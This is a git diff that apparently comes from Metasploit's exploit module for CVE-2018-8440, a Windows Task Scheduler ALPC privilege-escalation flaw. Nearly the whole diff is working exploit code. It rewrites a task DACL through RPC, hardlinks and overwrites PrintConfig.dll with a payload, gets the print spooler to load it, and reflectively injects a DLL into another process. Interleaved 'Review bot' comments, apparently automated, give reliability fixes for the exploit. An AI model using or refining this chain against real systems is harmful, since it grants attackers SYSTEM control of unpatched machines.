diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll
index 95416fd182..482ee17d14 100755
Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll differ
diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp
index 23dbb695b0..9ffc5edc10 100755
Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp differ
diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib
index 335264056d..5c68391ac7 100755
Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib differ
diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb
index 71d9bea5d5..903d74c36c 100755
Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb differ
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
index 8ede068a30..b081e10b76 100755
--- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
@@ -77,7 +77,7 @@ void RunExploit()
 _SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
 }
-int mainf()
+int mainf(LPVOID lpReserved)
 {
 //We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service
 //You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases.
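Review bot: The new `lpReserved` parameter of mainf is undocumented, and its name only records where the value originated (DllMain's lpReserved), not what it is expected to point at. From the other hunks in this commit it appears to be the thread argument forwarded from DllMain, which the Ruby loader sets to the address of a buffer it wrote into the process; that contract belongs in a comment above the signature, e.g. `// lpReserved: thread argument forwarded from DllMain; expected to point into the buffer the loader placed in this process`. The body of mainf continues past the end of this hunk.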
@@ -112,37 +112,21 @@ int mainf()
 CreateNativeHardlink(jobPath, prntCnfg);
 RunExploit();
- HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hPayload == INVALID_HANDLE_VALUE) {
- return(-1);
- }
-
- DWORD payloadSize = ::GetFileSize(hPayload, NULL);
-
- VOID* payloadBuffer = malloc(payloadSize);
- if (payloadBuffer == NULL) {
- return(-1);
- }
-
- DWORD bytesRead;
- ::ReadFile(hPayload, payloadBuffer, payloadSize, &bytesRead, NULL);
- if (payloadSize != bytesRead) {
- return(-1);
- }
+ MEMORY_BASIC_INFORMATION lpBuffer;
+ VirtualQuery(lpReserved, &lpBuffer, sizeof(MEMORY_BASIC_INFORMATION));
 //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue
 HANDLE hFile;
 DWORD dwBytesWritten = 0;
 do {
 hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
- WriteFile(hFile, (char*)payloadBuffer, bytesRead, &dwBytesWritten, NULL);
+ WriteFile(hFile, (char*)lpBuffer.AllocationBase, (DWORD)lpBuffer.RegionSize, &dwBytesWritten, NULL);
 if (hFile == INVALID_HANDLE_VALUE) {
 Sleep(5000);
 }
 } while (hFile == INVALID_HANDLE_VALUE);
 CloseHandle(hFile);
- CloseHandle(hPayload);
 //After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
 CoInitialize(nullptr);
@@ -159,9 +143,9 @@ int mainf()
 return 0;
 }
-DWORD CALLBACK ExploitThread(LPVOID hModule)
+DWORD CALLBACK ExploitThread(LPVOID lpReserved)
 {
- mainf();
- FreeLibraryAndExitThread((HMODULE)hModule, 0);
+ mainf(lpReserved);
+ FreeLibraryAndExitThread(GetModuleHandle(NULL), 0);
 return 0;
 }
\ No newline at end of file
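Review bot: The return value of VirtualQuery on the added line is never checked, so when the query fails `lpBuffer` stays uninitialized and the WriteFile call further down receives an indeterminate base pointer and length. The code this replaces returned early after each failed step, and the replacement should keep that shape: `if (VirtualQuery(lpReserved, &lpBuffer, sizeof(lpBuffer)) == 0) { return -1; }`. The name `lpBuffer` also reads as a pointer although it is the MEMORY_BASIC_INFORMATION value itself; `mbi` would follow the usual Win32 convention. WriteFile is still issued before hFile is compared against INVALID_HANDLE_VALUE, which predates this change. mainf starts before this hunk.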
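Review bot: `FreeLibraryAndExitThread(GetModuleHandle(NULL), 0)` no longer refers to this DLL: GetModuleHandle(NULL) returns the handle of the process's executable image, and the module handle the thread parameter used to carry is gone now that it carries lpReserved. If the intent is that this image is not registered with the loader and there is nothing to free, that should be stated, e.g. `// no own HMODULE is available here; GetModuleHandle(NULL) is the host executable and only ends the thread`; otherwise the DLL's own handle needs to reach ExploitThread by another route, and what FreeLibrary does with the host executable's handle is not something this code should rely on. Whether that intent holds is not visible in this hunk.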
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
index c48f4271c8..89c1f29d38 100755
--- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
@@ -11,7 +11,7 @@ BOOL APIENTRY DllMain(HMODULE hModule,
 switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
- CreateThread(NULL, 0, ExploitThread, hModule, 0, NULL);
+ CreateThread(NULL, 0, ExploitThread, lpReserved, 0, NULL);
 break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c
index 5358d1a939..54b8360739 100755
--- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c
@@ -4,7 +4,7 @@
 /* File created by MIDL compiler version 8.00.0603 */
-/* at Wed Sep 19 07:57:18 2018
+/* at Wed Sep 19 20:58:45 2018
 */
 /* Compiler settings for rpc.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h
index c92869566a..d216044a65 100755
--- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h
@@ -4,7 +4,7 @@
 /* File created by MIDL compiler version 8.00.0603 */
-/* at Wed Sep 19 07:57:18 2018
+/* at Wed Sep 19 20:58:45 2018
 */
 /* Compiler settings for rpc.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c
index 28b9c7d4d4..39f854b42b 100755
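Review bot: Passing DllMain's `lpReserved` as the thread argument repurposes a parameter whose documented meaning on DLL_PROCESS_ATTACH is only whether the load was static or dynamic; the value is meaningful here only when the loader that invokes DllMain deliberately supplies a data pointer in it, which the Ruby side of this commit appears to do by passing `payload_addr` as the thread parameter. That dependency should be recorded at the CreateThread line so nobody assumes a conventional LoadLibrary of this DLL behaves the same, e.g. `// lpReserved is expected to carry the address the loader handed to the injected thread (see alpc_taskscheduler.rb), not the documented static/dynamic-load value`. The handle returned by CreateThread is still not closed, which predates this change. DllMain starts before this hunk and continues after it.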
--- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c
@@ -4,7 +4,7 @@
 /* File created by MIDL compiler version 8.00.0603 */
-/* at Wed Sep 19 07:57:18 2018
+/* at Wed Sep 19 20:58:45 2018
 */
 /* Compiler settings for rpc.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603
diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb
index 0bf8894537..983869a7c6 100644
--- a/modules/exploits/windows/local/alpc_taskscheduler.rb
+++ b/modules/exploits/windows/local/alpc_taskscheduler.rb
@@ -95,38 +95,23 @@ class MetasploitModule < Msf::Exploit::Local
 @process_name = datastore['PROCESS'] || 'notepad.exe'
 end
- def overwrite_payload_path(exploit_data)
- # The payload path is hard-coded into the exploit
- # We need to change it, but the exploit binary is in UTF-16LE
- # But our parsers (right now) expect it to be encoded as ANSI-8bit
- # Covert the exploit binary to UTF-16, switch the values, then return
- # the encoding to whatever it was to begin with
- print_status("Attempting to change the payload path to #{payload_path}...")
-
- if payload_path.length > original_path.length
- fail_with(Failure::BadConfig,"Parameter PAYLOAD_NAME may not exceed #{original_path.length} characters, including extension")
- end
-
- original_encoding = exploit_data.encoding
- padded_path = payload_path + ("\x00" * (original_path.length-payload_path.length))
-
- padded_path.encode!("UTF-16LE")
- original_path.encode!("UTF-16LE")
- exploit_data.force_encoding("UTF-16LE")
-
- exploit_data.sub!(original_path, padded_path)
- exploit_data.force_encoding(original_encoding)
- end
-
 def inject_magic(process)
 library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
 library_path = ::File.expand_path(library_path)
 dll_data = ''
 ::File.open(library_path, 'rb') { |f| dll_data = f.read }
- overwrite_payload_path(dll_data)
+
+ print_status("Writing payload dll into process #{process.pid} memory")
+ payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
+ written = process.memory.write(payload_addr, payload_dll)
+
+ if written != payload_dll.length
+ fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
+ end
+
 print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
 exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
- process.thread.create(exploit_mem + offset)
+ process.thread.create(exploit_mem + offset, payload_addr)
 end
 def
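Review bot: `payload_dll` is used three times in the new lines of inject_magic but is neither assigned nor defined anywhere in the hunk, while the bytes just read from disk live in `dll_data`; unless a `payload_dll` helper exists elsewhere in the module (not visible here), the method raises NameError before anything is written. The removed overwrite_payload_path leaned on helpers such as `payload_path` and `original_path` in the same way, so a helper is plausible, but the two similarly named variables deserve a line telling them apart: `# dll_data is the exploit DLL read from disk; payload_dll is the payload to be staged in the target process (helper defined elsewhere in this module)`. inject_magic fits inside the hunk; the surrounding class continues past it.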
validate_active_host